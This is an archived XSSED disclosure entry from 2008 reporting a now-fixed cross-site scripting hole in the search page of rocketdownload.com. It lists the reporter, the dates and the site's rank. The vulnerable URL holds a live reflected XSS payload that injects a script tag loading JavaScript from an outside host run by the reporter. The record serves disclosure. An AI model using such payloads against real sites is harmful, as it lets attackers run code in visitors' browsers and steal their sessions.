Fixed XSS vulnerability at www.rocketdownload.com

2008-01-18T00:00:00
ID XSSED:31258
Type xssed
Reporter mygot_manoel
Modified 2008-02-27T00:00:00

Description

Security researcher mygot_manoel, has submitted on 18/01/2008 a cross-site-scripting (XSS) vulnerability affecting www.rocketdownload.com, which at the time of submission ranked 318987 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/02/2008. It is currently fixed.

Vulnerable URL: http://www.rocketdownload.com/search_res.php?terms="><scriptsrc=http://mygot.110mb.com/lol.js>&submit.x=0&submit.y=0&Match=0&Realm=All